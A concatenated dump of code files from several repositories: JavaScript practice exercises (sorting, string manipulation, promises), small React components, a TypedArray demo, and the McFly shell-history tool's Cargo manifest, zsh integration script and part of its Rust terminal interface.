// // // // var leftArr=merge(arr.slice(0,midpt))
// // // // var rightArr=merge(arr.slice(-midpt))
// // // // return combine(leftArr,rightArr);
// // // // }
// // // // console.log(merge([2,3,4,0,1,5,9]));
// // // //helper function Partition--> goal is to pick a number at the end of the array, and arrange the array so that there is this element has everything that is less than it to the left (doesn't have to be ordered) and everything greater than it to the right (doesnt have to be ordered)
// // // const partition = (arr, start=0, end = arr.length-1)=>{ //when integrating this with quicksort, you'll need to give default parameters
// // // var numless=start;
// // // for(var i=start; i<=end;i++) {
// // // if((arr[i] < arr[end]) || (i == end)) {
// // // var temp = arr[numless];
// // // arr[numless] = arr[i];
// // // arr[i] = temp;
// // // numless++;
// // // }
// // // }
// // // numless--;
// // // return numless;
// // // }
// // // //[7,3,4,9,0,2,5]
// // // //select a element at the end (this element is called out pivot number) --(5)
// // // //go from left to right and count how many elements are less than the pivot, and whenever an element that is less than the pivot is found, swap the current value with the index of numless
// // // //[3,7,4,9,0,2,5]
// // // //[3,4,7,9,0,2,5]
// // // //[3,4,0,9,7,2,5]
// // // //[3,4,0,2,7,9,5]
// // // //[3,4,0,2,5,9,7]
// // // //return back the index number that the pivot number ended up in->4
// // // // partition([7,3,4,9,0,2,5])
// // // //numless = 0->1->2->3->4
// // // const quicksort = (arr, start=0, end = arr.length-1)=>{
// // // if(end > start) {
// // // var pivotInd = partition(arr, start, end);
// // // quicksort(arr, start, pivotInd-1);
// // // quicksort(arr, pivotInd+1,end);
// // // }
// // // }
// // // var arr = [3,7,4,9,0,2,5];
// // // quicksort(arr);
// // // console.log(arr);
// // ////given a string that can be a sentence, put each word into an array
// // // let sentence = "Hi everybody, welcome to week two"
// // // const stringToWordArr = (input)=>{
// // // var arr=[];
// // // var word = "";
// // // for(var i=0; i<input.length; i++) {
// // // if(input[i] == " ") {
// // // arr.push(word.replace(/[,]+/, "").trim());
// // // word="";
// // // }
// // // else if(input[i] == [a-zA-Z]) word +=input[i];
// // // }
// // // if(word!="") arr.push(word);
// // // console.log(arr);
// // // }
// // // stringToWordArr(sentence) //["Hi", "everybody," , "welcome", "to", "week", "two"]
// // //rotate string--> given a string and a number, return a string that is the rotated version of the original by x number of characters
// // // function rotateString(str,num){
// // // // let result=str.substr(str.length-num)+str.substr(0,str.length-num);
// // // let result="";
// // // for(var i=str.length-num; i<=str.length-1; i++) {
// // // result += str[i];
// // // }
// // // for(var i=0; i<str.length-num; i++) {
// // // result += str[i];
// // // }
// // // return result;
// // // }
// // // rotateString("hello", 2) //"olhel"
// // // rotateString("steph curry is best shooter of all time", 4) //"time steph curry is best shooter of all"
// // // rotateString("them roots tho", 6) //"ts thothem roo"
// // // //bonus- isRotation-->given two strings, return a boolean on if they are rotations of one another
// // // function isRotation(str1, str2){
// // // for(var i=1; i<str1.length; i++) {
// // // if(rotateString(str1,i) == str2) return true;
// // // }
// // // return false;
// // // }
// // // console.log(isRotation("hello", "lohel")) //true
// // // console.log(isRotation("abcd", "dacc")) //false
// // // //instructions: Given a string, create a function that returns to you a new string containing only the latest instance of each letter from the sentence, without any duplicates. Make it case sensitive first so 'S' and 's' are not considered duplicates
// // // function dedupeStr(str){
// // // var arr=[];
// // // for(var i=0;i<str.length-1;i++) {
// // // for(var j=i+1; j<str.length; j++) {
// // // if(str[i] == str[j]) break;
// // // else {
// // // if(j==str.length-1) arr.push(str[i]);
// // // }
// // // }
// // // if(i==str.length-2) arr.push(str[i+1]);
// // // }
// // // return arr;
// // // }
// // // console.log(dedupeStr("Snaps! crackles! pops!"))// ['S', 'n', 'r', 'a', 'c', 'k', 'l', 'e', ' ', 'o', 'p', 's', '!' ]
// // //encode--> given a string with repeating consecuctive characters, give a number for each number of repeats next to the letter
// // //example ---> aaabccccdd -> a3b1c3d2
// // const encode = (str)=>{
// // let output = ""
// // let count = 0;
// // for(var i=0;i<str.length;i++) {
// // if (i==0 || str[i]==str[i-1]) count++
// // else {
// // output += str[i-1]+count;
// // count=1;
// // }
// // }
// // return output
// // }
// // console.log(encode("aaabbbsddsssddcccaaabc")) //a3b1c3d2
// // //decode--> given an encoded string, decode it
// // //example ---> a2b3c1---> aabbbc
// // const decode = (str)=>{
// // let output = ""
// // for(var i=0;i<str.length-1;i++) {
// // if(/[a-z]/.test(str[i])){
// // var stopInd = str.substring(i+1).search(/[a-zA-Z]/)+1
// // if (!stopInd) stopInd=(str.length-1)-i;
// // output += (str[i]).repeat(parseInt(str.substring(i+1,stopInd+i+1)));
// // }
// // }
// // return output;
// // }
// // console.log(decode("a10b10c1")) //aabbbc
// //Intersect Sorted Arrays
// //Given two sorted arrays, return a new array containing all the numbers they have in common
// //Ex: given [2,4,7,9,10] and [2,3,5,7,9,10], return [2,7,9,10]
// //Ex: given [1,1,4,5,8] and [1,1,1,5,6,8] return [1,1,5,8]
// //Ex: given [1,3,5,7,9] and [2,4,6,8,10] return []
// const intersect = (arrLeft, arrRight) => {
// const result = arrLeft.filter(val => {
// const ind = arrRight.indexOf(val);
// if(ind!=-1) arrRight.splice(ind,1);
// return ind > -1
// })
// return result;
// }
// console.log(intersect([2,3,5,7,9,10],[2,4,7,9,10]));
// console.log(intersect([1,1,1,5,6,8],[1,1,4,5,8]));
// console.log(intersect([2,4,6,8,10],[1,3,5,7,9]));
// console.log(intersect([-5, 0, 1, 1, 1, 1, 1, 2, 4, 4, 6, 7],[-9, 1, 3, 4, 4, 4, 4, 4, 4, 5, 7]));
// //Union Sorted Arrays
// //Efficiently combine two pre-sorted arrays into a new sorted array
// //Ex: given [2,4,7,9,10] and [2,3,5,7,9,10], return [2,3,4,5,7,9,10]
// //Ex: given [1,2,2,2,7] and [2,2,6,6,7] return [1,2,2,2,6,6,7]
// //Ex: given [1,5,9] and [2,6,10] return [1,2,5,6,9,10]
// const union = (arrLeft, arrRight) => {
// arrLeft.forEach(val => {
// const ind = arrRight.indexOf(val);
// if(ind!=-1) arrRight.splice(ind,1);
// })
// result=arrLeft.concat(arrRight)
// return result.sort((a,b)=>a-b);
// }
// console.log(union([2,4,7,9,10],[2,3,5,7,9,10]));
// console.log(union([2,2,6,6,7],[1,2,2,2,7]));
// console.log(union([1,5,9],[2,6,10]));
// console.log(union([2,6,10],[1,5,9]));
function fiveHeads() {
return new Promise( (resolve, reject) => {
if(Math.floor(Math.random()*2)==0) resolve("head");
else reject("tail")
});
}
fiveHeads()
.then( res => console.log(res) )
.catch( err => console.log(err) );
console.log( "When does this run now?" );
<file_sep>/React/Class Components/putting_together/src/components/Person.jsx
import React, { Component } from 'react';
class Person extends Component {
constructor(props) {
super(props);
this.state = {
age: this.props.age
};
}
render() {
let addAge = ()=>{
this.setState({age:this.state.age+1})
}
return (
<div>
<h2>{this.props.name}</h2>
<h4>Age: {this.state.age}</h4>
<h4>hair Color: {this.props.hairColor}</h4>
<button onClick={addAge}>Birthday Button for {this.props.name}</button>
</div>
)
}
}
export default Person;<file_sep>/React/Functional Components/to-do-list/src/components/Form.jsx
import React,{useState} from 'react';
const Form = (props)=>{
const [itemVal, setItemVal] = useState("");
const handleSubmit = (e) =>{
e.preventDefault();
const item = {
name: itemVal,
complete:false,
};
props.onNewSubmit(item);
}
return(
<>
<form onSubmit={handleSubmit}>
<input type="text" name="" id="" onChange={(e)=> setItemVal(e.target.value)} />
<button type="submit">Add</button>
</form>
</>
)
}
export default Form; | ccd8275813a430ac63ae1ca743a5871b8c124954 | [
"JavaScript"
] | 6 | JavaScript | youk0160/MERN | a5807bbffff276d6b42380fb443675a8c5e33334 | 42eb75b81b306d60e54e9580d5f217c3a2e88255 |
refs/heads/master | <repo_name>Merlot1818/ArraryBuffer<file_sep>/TypedArray.js
// create a TypedArray with a size in bytes
const typedArray1 = new Int8Array(8);
typedArray1[0] = 32;
const typedArray2 = new Int8Array(typedArray1);
typedArray2[1] = 42;
console.log(typedArray1);
// expected output: Int8Array [32, 0, 0, 0, 0, 0, 0, 0]
console.log(typedArray2);
// expected output: Int8Array [32, 42, 0, 0, 0, 0, 0, 0]
var buffer = new ArrayBuffer(16);
var int32View = new Int32Array(buffer);
console.log(int32View.length);
for (var i = 0; i < int32View.length; i++) {
int32View[i] = i * 2;
}
var int16View = new Int16Array(buffer);
for (var i = 0; i < int16View.length; i++) {
console.log("Entry " + i + ": " + int16View[i]);
}
// 假定某段buffer包含如下字节 [0x02, 0x01, 0x03, 0x07]
var buffer = new ArrayBuffer(4);
var v1 = new Uint8Array(buffer);
v1[0] = 2;
v1[1] = 1;
v1[2] = 3;
v1[3] = 7;
var uInt16View = new Uint16Array(buffer);
// 计算机采用小端字节序
// 所以头两个字节等于258
console.log(uInt16View);
if (uInt16View[0] === 258) {
console.log('OK'); // "OK"
}
// 赋值运算
uInt16View[0] = 255; // 字节变为[0xFF, 0x00, 0x03, 0x07]
uInt16View[0] = 0xff05; // 字节变为[0x05, 0xFF, 0x03, 0x07]
uInt16View[1] = 0x0210; // 字节变为[0x05, 0xFF, 0x10, 0x02]
console.log(uInt16View);<file_sep>/README.md
# ArraryBuffer
# 参考链接
1. https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Global_Objects/ArrayBuffer#%E4%BB%A5%E7%8E%B0%E6%9C%89%E6%95%B0%E6%8D%AE%E8%8E%B7%E5%8F%96_ArrayBuffer
2. https://developer.mozilla.org/zh-CN/docs/Web/API/WindowBase64/Base64_encoding_and_decoding#Appendix.3A_Decode_a_Base64_string_to_Uint8Array_or_ArrayBuffer
3. https://developer.mozilla.org/zh-CN/docs/Web/API/FileReader#readAsArrayBuffer()
4. | 6421a922f4b281895b3ad97da2800a16d994f8d6 | [
"JavaScript",
"Markdown"
] | 2 | JavaScript | Merlot1818/ArraryBuffer | 57729a61f666245b1bbca138b92fbac0c4edc0a2 | ccbd0a0e777603c38e2f4a51ceea7e588fcbf150 |
refs/heads/master | <repo_name>abdulkareem-mnv-dev/coalition<file_sep>/database/factories/ProductsFactory.php
<?php
/** @var \Illuminate\Database\Eloquent\Factory $factory */
use App\Products;
use Faker\Generator as Faker;
$factory->define(Products::class, function (Faker $faker) {
return [
'name' => $faker->unique()->words(1,true),
'quantity' => rand(1,30),
'price' => rand(50,1000)
];
});
<file_sep>/app/Http/Controllers/indexController.php
<?php
namespace App\Http\Controllers;
use Illuminate\Http\Request;
use App\Products;
class indexController extends Controller
{
public function index(){
$products = Products::orderBy('created_at', 'DESC')->get();
return view('product_page')->with([
'products' => $products
]);
}
public function addProduct(Request $request){
$data = $request->all();
$product = new Products();
$product->name = $data['name'];
$product->quantity = $data['quantity'];
$product->price = $data['price'];
$product->save();
return response()->json(['product' => $product]);
}
}
| 0b6670bfa725978a9611ec7d7e5c911e7378127d | [
"PHP"
] | 2 | PHP | abdulkareem-mnv-dev/coalition | b690c376d9e6fc5921dbed96c1c5bd81b968cf1b | 2a95e0fb0b194b15ee8fa944317248a8128071f9 |
refs/heads/master | <repo_name>rcereceda/prueba_js<file_sep>/p3/main.js
function Alumno(nombre, notas) {
this.nombre = typeof(nombre) == "string" ? nombre : "Juan";
this.notas = Array.isArray(notas) ? notas : [0, 0, 0];
this.promedio = function() {
var suma = 0;
var n = 0;
for (var i = 0; i < this.notas.length; i++) {
if (!(isNaN(this.notas[i]))) {
suma += parseInt(this.notas[i]);
n++;
}
}
return n > 0 ? (suma/n) : 0;
}
}
var alumno1 = new Alumno("Rodrigo", [10, 9, 10]);
var promedio1 = alumno1.promedio();
console.log(promedio1);<file_sep>/p5/main.js
var x = 0;
$("[name=left]").on('click', function() {
$("[name=box]").css({left: x - 50, position:'absolute'});
x = $("[name=box]").position().left;
})
$("[name=right]").on('click', function() {
$("[name=box]").css({left: x + 50, position:'absolute'});
x = $("[name=box]").position().left;
})<file_sep>/p1/main.js
var alumno1 = {nombre:"Matías", edad:5}
var alumno2 = alumno1
alumno2.nombre = "Sebastián"
console.log("Alumno 1: " + alumno1.nombre);
console.log("Alumno 2: " + alumno2.nombre);<file_sep>/p2/main.js
var user1 = {
nombre: "Rodrigo",
edad: 33,
arr: [1,2,3]
};
function copiarObjeto(obj) {
return (JSON.parse(JSON.stringify(obj)));
}
var user2 = copiarObjeto(user1);
user2.nombre = "Jorge";
console.log("Rodrigo: " + user1.arr[0]);
console.log("Jorge: " + user2.arr[0]);<file_sep>/p6/main.js
var count = 3;
$("div").on('click', function() {
count++;
$("ol").append("<li>Elemento " + count + "</li>");
})
$("div").on('click', 'li' , function (e) {
e.stopPropagation();
}) | ed6884bafa47d59b5d6565c437f0f3787d68898b | [
"JavaScript"
] | 5 | JavaScript | rcereceda/prueba_js | be008e8efb3b292f7313f6fe5318c1f417d432f1 | a6f2d70d2cca14637de33694e63e268613ea798c |
refs/heads/master | <repo_name>nfultz/mcfly<file_sep>/Cargo.toml
[package]
name = "mcfly"
version = "0.5.13"
authors = ["<NAME> <<EMAIL>>"]
edition = "2018"
description = "McFly replaces your default ctrl-r shell history search with an intelligent search engine that takes into account your working directory and the context of recently executed commands. McFly's suggestions are prioritized in real time with a small neural network."
license = "MIT"
repository = "https://github.com/cantino/mcfly"
exclude = [
"HomebrewFormula",
"HomebrewFormula/*",
"pkg/*",
"docs/*",
]
[profile.release]
lto = true
[profile.dev]
debug = true
[dependencies]
chrono = "0.4.19"
clap = "2.33"
csv = "1"
dirs = "2.0"
humantime = "2.1.0"
itertools = "0.9.0"
libc = "0.2"
rand = "0.7"
regex = "1"
relative-path = "1.0"
shellexpand = "2.0"
termion = "1.5.5"
unicode-segmentation = "1.6"
[dependencies.rusqlite]
version = "0.15.0"
features = ["bundled", "functions", "unlock_notify"]
<file_sep>/mcfly.zsh
#!/bin/zsh
# Ensure stdin is a tty
[[ ! -o interactive ]] && return 0
# Avoid loading this file more than once
if [[ "$__MCFLY_LOADED" == "loaded" ]]; then
return 0
fi
__MCFLY_LOADED="loaded"
# Ensure HISTFILE exists.
export HISTFILE="${HISTFILE:-$HOME/.zsh_history}"
if [[ ! -r "${HISTFILE}" ]]; then
echo "McFly: ${HISTFILE} does not exist or is not readable. Please fix this or set HISTFILE to something else before using McFly."
return 1
fi
# MCFLY_SESSION_ID is used by McFly internally to keep track of the commands from a particular terminal session.
export MCFLY_SESSION_ID=$(command dd if=/dev/urandom bs=256 count=1 2> /dev/null | LC_ALL=C command tr -dc 'a-zA-Z0-9' | command head -c 24)
# Find the binary
MCFLY_PATH=${MCFLY_PATH:-$(command -v mcfly)}
if [[ -z "$MCFLY_PATH" || "$MCFLY_PATH" == "mcfly not found" ]]; then
echo "Cannot find the mcfly binary, please make sure that mcfly is in your path before sourcing mcfly.zsh."
return 1
fi
# Required for commented out mcfly search commands to work.
setopt interactive_comments # allow comments in interactive shells (like Bash does)
# McFly's temporary, per-session history file.
if [[ ! -f "${MCFLY_HISTORY}" ]]; then
export MCFLY_HISTORY=$(command mktemp -t mcfly.XXXXXXXX)
fi
# Check if we need to use extended history
if [[ -o extendedhistory ]]; then
export MCFLY_HISTORY_FORMAT="zsh-extended"
else
export MCFLY_HISTORY_FORMAT="zsh"
fi
# Setup a function to be used by $PROMPT_COMMAND.
function mcfly_prompt_command {
local exit_code=$? # Record exit status of previous command.
# Populate McFly's temporary, per-session history file from recent commands in the shell's primary HISTFILE.
if [[ ! -f "${MCFLY_HISTORY}" ]]; then
export MCFLY_HISTORY=$(command mktemp -t mcfly.XXXXXXXX)
command tail -n100 "${HISTFILE}" >| ${MCFLY_HISTORY}
fi
# Write history to $MCFLY_HISTORY.
fc -W "${MCFLY_HISTORY}"
# Run mcfly with the saved code. It fill find the text of the last command in $MCFLY_HISTORY and save it to the database.
[ -n "$MCFLY_DEBUG" ] && echo "mcfly.zsh: Run mcfly add --exit ${exit_code}"
$MCFLY_PATH --history_format $MCFLY_HISTORY_FORMAT add --exit ${exit_code}
return ${exit_code} # Restore the original exit code by returning it.
}
precmd_functions+=(mcfly_prompt_command)
# Cleanup $MCFLY_HISTORY tmp files on exit.
exit_logger() {
[ -n "$MCFLY_DEBUG" ] && echo "mcfly.zsh: Exiting and removing $MCFLY_HISTORY"
command rm -f $MCFLY_HISTORY
}
zshexit_functions+=(exit_logger)
# If this is an interactive shell, take ownership of ctrl-r.
if [[ $- =~ .*i.* ]]; then
mcfly-history-widget() {
() {
echoti rmkx
exec </dev/tty
local mcfly_output=$(mktemp -t mcfly.output.XXXXXXXX)
$MCFLY_PATH --history_format $MCFLY_HISTORY_FORMAT search -o "${mcfly_output}" "${LBUFFER}"
echoti smkx
# Interpret commandline/run requests from McFly
while read -r key val; do
if [[ "$key" = "mode" ]]; then local mode="$val"; fi
if [[ "$key" = "commandline" ]]; then local commandline="$val"; fi
done < "${mcfly_output}"
command rm -f $mcfly_output
if [[ -n $commandline ]]; then
RBUFFER=""
LBUFFER="${commandline}"
fi
if [[ "${mode}" == "run" ]]; then
zle accept-line
fi
zle redisplay
}
}
zle -N mcfly-history-widget
bindkey '^R' mcfly-history-widget
fi
<file_sep>/src/interface.rs
use crate::command_input::{CommandInput, Move};
use crate::history::History;
use crate::fixed_length_grapheme_string::FixedLengthGraphemeString;
use crate::history::Command;
use crate::history_cleaner;
use crate::settings::Settings;
use crate::settings::{InterfaceView, KeyScheme};
use chrono::{Duration, TimeZone, Utc};
use humantime::format_duration;
use std::io::{stdin, stdout, Write};
use termion::color;
use termion::event::Key;
use termion::input::TermRead;
use termion::raw::IntoRawMode;
use termion::screen::AlternateScreen;
use termion::{clear, cursor, terminal_size};
pub struct Interface<'a> {
history: &'a History,
settings: &'a Settings,
input: CommandInput,
selection: usize,
matches: Vec<Command>,
debug: bool,
run: bool,
delete_requests: Vec<String>,
menu_mode: MenuMode,
in_vim_insert_mode: bool,
}
pub struct SelectionResult {
/// Whether the user requested to run the resulting command immediately.
pub run: bool,
/// The command string the user selected, if any.
pub selection: Option<String>,
/// Commands the user has requested be deleted from shell history.
pub delete_requests: Vec<String>,
}
pub enum MoveSelection {
Up,
Down,
}
#[derive(PartialEq)]
pub enum MenuMode {
Normal,
ConfirmDelete,
}
impl MenuMode {
fn text(&self, interface: &Interface) -> &str {
match *self {
MenuMode::Normal => match interface.settings.key_scheme {
KeyScheme::Emacs => "McFly | ESC - Exit | ⏎ - Run | TAB - Edit | F2 - Delete",
KeyScheme::Vim => {
if interface.in_vim_insert_mode {
"McFly (Ins) | ESC - Cmd | ⏎ - Run | TAB - Edit | F2 - Delete"
} else {
"McFly (Cmd) | ESC - Exit | ⏎ - Run | TAB - Edit | F2 - Delete"
}
}
},
MenuMode::ConfirmDelete => "Delete selected command from the history? (Y/N)",
}
}
fn bg(&self) -> String {
match *self {
MenuMode::Normal => color::Bg(color::LightBlue).to_string(),
MenuMode::ConfirmDelete => color::Bg(color::Red).to_string(),
}
}
}
const PROMPT_LINE_INDEX: u16 = 3;
const INFO_LINE_INDEX: u16 = 1;
const RESULTS_TOP_INDEX: u16 = 5;
impl<'a> Interface<'a> {
pub fn new(settings: &'a Settings, history: &'a History) -> Interface<'a> {
Interface {
history,
settings,
input: CommandInput::from(settings.command.to_owned()),
selection: 0,
matches: Vec::new(),
debug: settings.debug,
run: false,
delete_requests: Vec::new(),
menu_mode: MenuMode::Normal,
in_vim_insert_mode: true,
}
}
pub fn display(&mut self) -> SelectionResult {
self.build_cache_table();
self.select();
let command = self.input.command.to_owned();
if command.chars().any(|c| !c.is_whitespace()) {
self.history.record_selected_from_ui(
&command,
&self.settings.session_id,
&self.settings.dir,
);
SelectionResult {
run: self.run,
selection: Some(command),
// Remove delete_requests from the Interface, in case it's used to display() again.
delete_requests: self.delete_requests.split_off(0),
}
} else {
SelectionResult {
run: self.run,
selection: None,
delete_requests: self.delete_requests.split_off(0),
}
}
}
fn build_cache_table(&self) {
self.history.build_cache_table(
&self.settings.dir.to_owned(),
&Some(self.settings.session_id.to_owned()),
None,
None,
None,
self.settings.limit.to_owned(),
);
}
fn menubar<W: Write>(&self, screen: &mut W) {
if !self.settings.disable_menu {
let (width, _height): (u16, u16) = terminal_size().unwrap();
write!(
screen,
"{hide}{cursor}{clear}{fg}{bg}{text:width$}{reset_bg}",
hide = cursor::Hide,
fg = color::Fg(color::LightWhite),
bg = self.menu_mode.bg(),
cursor = cursor::Goto(1, self.info_line_index()),
clear = clear::CurrentLine,
text = self.menu_mode.text(self),
reset_bg = color::Bg(color::Reset),
width = width as usize
)
.unwrap();
screen.flush().unwrap();
}
}
fn prompt<W: Write>(&self, screen: &mut W) {
let prompt_line_index = self.prompt_line_index();
write!(
screen,
"{}{}{}$ {}",
if self.settings.lightmode {
color::Fg(color::Black).to_string()
} else {
color::Fg(color::LightWhite).to_string()
},
cursor::Goto(1, self.prompt_line_index()),
clear::CurrentLine,
self.input
)
.unwrap();
write!(
screen,
"{}{}",
cursor::Goto(self.input.cursor as u16 + 3, prompt_line_index),
cursor::Show
)
.unwrap();
screen.flush().unwrap();
}
fn debug_cursor<W: Write>(&self, screen: &mut W) {
let result_top_index = self.result_top_index();
write!(
screen,
"{}{}",
cursor::Hide,
cursor::Goto(0, result_top_index + self.settings.results + 1)
)
.unwrap();
screen.flush().unwrap();
}
fn results<W: Write>(&mut self, screen: &mut W) {
let result_top_index = self.result_top_index();
write!(
screen,
"{}{}{}",
cursor::Hide,
cursor::Goto(1, result_top_index),
clear::All
)
.unwrap();
let (width, _height): (u16, u16) = terminal_size().unwrap();
if !self.matches.is_empty() && self.selection > self.matches.len() - 1 {
self.selection = self.matches.len() - 1;
}
for (index, command) in self.matches.iter().enumerate() {
let mut fg = if self.settings.lightmode {
color::Fg(color::Black).to_string()
} else {
color::Fg(color::LightWhite).to_string()
};
let mut highlight = if self.settings.lightmode {
color::Fg(color::Blue).to_string()
} else {
color::Fg(color::Green).to_string()
};
let mut bg = color::Bg(color::Reset).to_string();
if index == self.selection {
if self.settings.lightmode {
fg = color::Fg(color::LightWhite).to_string();
bg = color::Bg(color::LightBlack).to_string();
highlight = color::Fg(color::White).to_string();
} else {
fg = color::Fg(color::Black).to_string();
bg = color::Bg(color::LightWhite).to_string();
highlight = color::Fg(color::Green).to_string();
}
}
write!(screen, "{}{}", fg, bg).unwrap();
let command_line_index = self.command_line_index(index as i16);
write!(
screen,
"{}{}",
cursor::Goto(
1,
(command_line_index as i16 + result_top_index as i16) as u16
),
Interface::truncate_for_display(
command,
&self.input.command,
width,
highlight,
fg,
self.debug
)
)
.unwrap();
if command.last_run.is_some() {
write!(
screen,
"{}",
cursor::Goto(
width - 9,
(command_line_index as i16 + result_top_index as i16) as u16
)
)
.unwrap();
let duration = &format_duration(
Duration::minutes(
Utc::now()
.signed_duration_since(Utc.timestamp(command.last_run.unwrap(), 0))
.num_minutes(),
)
.to_std()
.unwrap(),
)
.to_string()
.split(' ')
.take(2)
.map(|s| {
s.replace("years", "y")
.replace("year", "y")
.replace("months", "mo")
.replace("month", "mo")
.replace("days", "d")
.replace("day", "d")
.replace("hours", "h")
.replace("hour", "h")
.replace("minutes", "m")
.replace("minute", "m")
.replace("0s", "< 1m")
})
.collect::<Vec<String>>()
.join(" ");
let highlight = if self.settings.lightmode {
color::Fg(color::Blue).to_string()
} else {
color::Fg(color::LightBlue).to_string()
};
write!(screen, "{}", highlight).unwrap();
write!(screen, "{:>9}", duration).unwrap();
}
write!(screen, "{}", color::Bg(color::Reset)).unwrap();
write!(screen, "{}", color::Fg(color::Reset)).unwrap();
}
screen.flush().unwrap();
}
#[allow(unused)]
fn debug<W: Write, S: Into<String>>(&self, screen: &mut W, s: S) {
write!(
screen,
"{}{}{}",
cursor::Goto(1, 2),
clear::CurrentLine,
s.into()
)
.unwrap();
screen.flush().unwrap();
}
fn move_selection(&mut self, direction: MoveSelection) {
if self.is_screen_view_bottom() {
match direction {
MoveSelection::Up => {
self.selection += 1;
}
MoveSelection::Down => {
if self.selection > 0 {
self.selection -= 1;
}
}
}
} else {
match direction {
MoveSelection::Up => {
if self.selection > 0 {
self.selection -= 1;
}
}
MoveSelection::Down => {
self.selection += 1;
}
}
}
}
fn accept_selection(&mut self) {
if !self.matches.is_empty() {
self.input.set(&self.matches[self.selection].cmd);
}
}
fn confirm(&mut self, confirmation: bool) {
if confirmation {
if let MenuMode::ConfirmDelete = self.menu_mode {
self.delete_selection()
}
}
self.menu_mode = MenuMode::Normal;
}
fn delete_selection(&mut self) {
if !self.matches.is_empty() {
{
let command = &self.matches[self.selection];
history_cleaner::clean(self.settings, self.history, &command.cmd);
self.delete_requests.push(command.cmd.clone());
}
self.build_cache_table();
self.refresh_matches();
}
}
fn refresh_matches(&mut self) {
self.selection = 0;
self.matches = self.history.find_matches(
&self.input.command,
self.settings.results as i16,
self.settings.fuzzy,
&self.settings.result_sort,
);
}
fn select(&mut self) {
let stdin = stdin();
let mut screen = AlternateScreen::from(stdout().into_raw_mode().unwrap());
// let mut screen = stdout().into_raw_mode().unwrap();
write!(screen, "{}", clear::All).unwrap();
self.refresh_matches();
self.results(&mut screen);
self.menubar(&mut screen);
self.prompt(&mut screen);
for c in stdin.keys() {
self.debug_cursor(&mut screen);
if self.menu_mode != MenuMode::Normal {
match c.unwrap() {
Key::Ctrl('c')
| Key::Ctrl('d')
| Key::Ctrl('g')
| Key::Ctrl('z')
| Key::Ctrl('r') => {
self.run = false;
self.input.clear();
break;
}
Key::Char('y') | Key::Char('Y') => {
self.confirm(true);
}
Key::Char('n') | Key::Char('N') | Key::Esc => {
self.confirm(false);
}
_ => {}
}
} else {
let early_out = match self.settings.key_scheme {
KeyScheme::Emacs => self.select_with_emacs_key_scheme(c.unwrap()),
KeyScheme::Vim => self.select_with_vim_key_scheme(c.unwrap()),
};
if early_out {
break;
}
}
self.results(&mut screen);
self.menubar(&mut screen);
self.prompt(&mut screen);
}
write!(screen, "{}{}", clear::All, cursor::Show).unwrap();
}
fn select_with_emacs_key_scheme(&mut self, k: Key) -> bool {
match k {
Key::Char('\n') | Key::Char('\r') | Key::Ctrl('j') => {
self.run = true;
self.accept_selection();
return true;
}
Key::Char('\t') => {
self.run = false;
self.accept_selection();
return true;
}
Key::Ctrl('c') | Key::Ctrl('g') | Key::Ctrl('z') | Key::Esc | Key::Ctrl('r') => {
self.run = false;
self.input.clear();
return true;
}
Key::Ctrl('b') => self.input.move_cursor(Move::Backward),
Key::Ctrl('f') => self.input.move_cursor(Move::Forward),
Key::Ctrl('a') => self.input.move_cursor(Move::BOL),
Key::Ctrl('e') => self.input.move_cursor(Move::EOL),
Key::Ctrl('w') | Key::Alt('\x08') | Key::Alt('\x7f') => {
self.input.delete(Move::BackwardWord);
self.refresh_matches();
}
Key::Alt('d') => {
self.input.delete(Move::ForwardWord);
self.refresh_matches();
}
Key::Ctrl('v') => {
self.debug = !self.debug;
}
Key::Alt('b') => self.input.move_cursor(Move::BackwardWord),
Key::Alt('f') => self.input.move_cursor(Move::ForwardWord),
Key::Left => self.input.move_cursor(Move::Backward),
Key::Right => self.input.move_cursor(Move::Forward),
Key::Up | Key::PageUp | Key::Ctrl('p') => self.move_selection(MoveSelection::Up),
Key::Down | Key::PageDown | Key::Ctrl('n') => self.move_selection(MoveSelection::Down),
Key::Ctrl('k') => {
self.input.delete(Move::EOL);
self.refresh_matches();
}
Key::Ctrl('u') => {
self.input.delete(Move::BOL);
self.refresh_matches();
}
Key::Backspace | Key::Ctrl('h') => {
self.input.delete(Move::Backward);
self.refresh_matches();
}
Key::Delete | Key::Ctrl('d') => {
self.input.delete(Move::Forward);
self.refresh_matches();
}
Key::Home => self.input.move_cursor(Move::BOL),
Key::End => self.input.move_cursor(Move::EOL),
Key::Char(c) => {
self.input.insert(c);
self.refresh_matches();
}
Key::F(2) => {
if !self.matches.is_empty() {
if self.settings.delete_without_confirm {
self.delete_selection();
} else {
self.menu_mode = MenuMode::ConfirmDelete;
}
}
}
_ => {}
}
false
}
fn select_with_vim_key_scheme(&mut self, k: Key) -> bool {
if self.in_vim_insert_mode {
match k {
Key::Char('\n') | Key::Char('\r') | Key::Ctrl('j') => {
self.run = true;
self.accept_selection();
return true;
}
Key::Char('\t') => {
self.run = false;
self.accept_selection();
return true;
}
Key::Ctrl('c') | Key::Ctrl('g') | Key::Ctrl('z') | Key::Ctrl('r') => {
self.run = false;
self.input.clear();
return true;
}
Key::Left => self.input.move_cursor(Move::Backward),
Key::Right => self.input.move_cursor(Move::Forward),
Key::Up | Key::PageUp | Key::Ctrl('u') | Key::Ctrl('p') => {
self.move_selection(MoveSelection::Up)
}
Key::Down | Key::PageDown | Key::Ctrl('d') | Key::Ctrl('n') => {
self.move_selection(MoveSelection::Down)
}
Key::Esc => self.in_vim_insert_mode = false,
Key::Backspace => {
self.input.delete(Move::Backward);
self.refresh_matches();
}
Key::Delete => {
self.input.delete(Move::Forward);
self.refresh_matches();
}
Key::Home => self.input.move_cursor(Move::BOL),
Key::End => self.input.move_cursor(Move::EOL),
Key::Char(c) => {
self.input.insert(c);
self.refresh_matches();
}
Key::F(2) => {
if !self.matches.is_empty() {
if self.settings.delete_without_confirm {
self.delete_selection();
} else {
self.menu_mode = MenuMode::ConfirmDelete;
}
}
}
_ => {}
}
} else {
match k {
Key::Char('\n') | Key::Char('\r') | Key::Ctrl('j') => {
self.run = true;
self.accept_selection();
return true;
}
Key::Char('\t') => {
self.run = false;
self.accept_selection();
return true;
}
Key::Ctrl('c')
| Key::Ctrl('g')
| Key::Ctrl('z')
| Key::Esc
| Key::Char('q')
// TODO add ZZ as shortcut
| Key::Ctrl('r') => {
self.run = false;
self.input.clear();
return true;
}
Key::Left | Key::Char('h') => self.input.move_cursor(Move::Backward),
Key::Right | Key::Char('l') => self.input.move_cursor(Move::Forward),
Key::Up | Key::PageUp | Key::Char('k') | Key::Ctrl('u') => self.move_selection(MoveSelection::Up),
Key::Down | Key::PageDown | Key::Char('j') | Key::Ctrl('d') => self.move_selection(MoveSelection::Down),
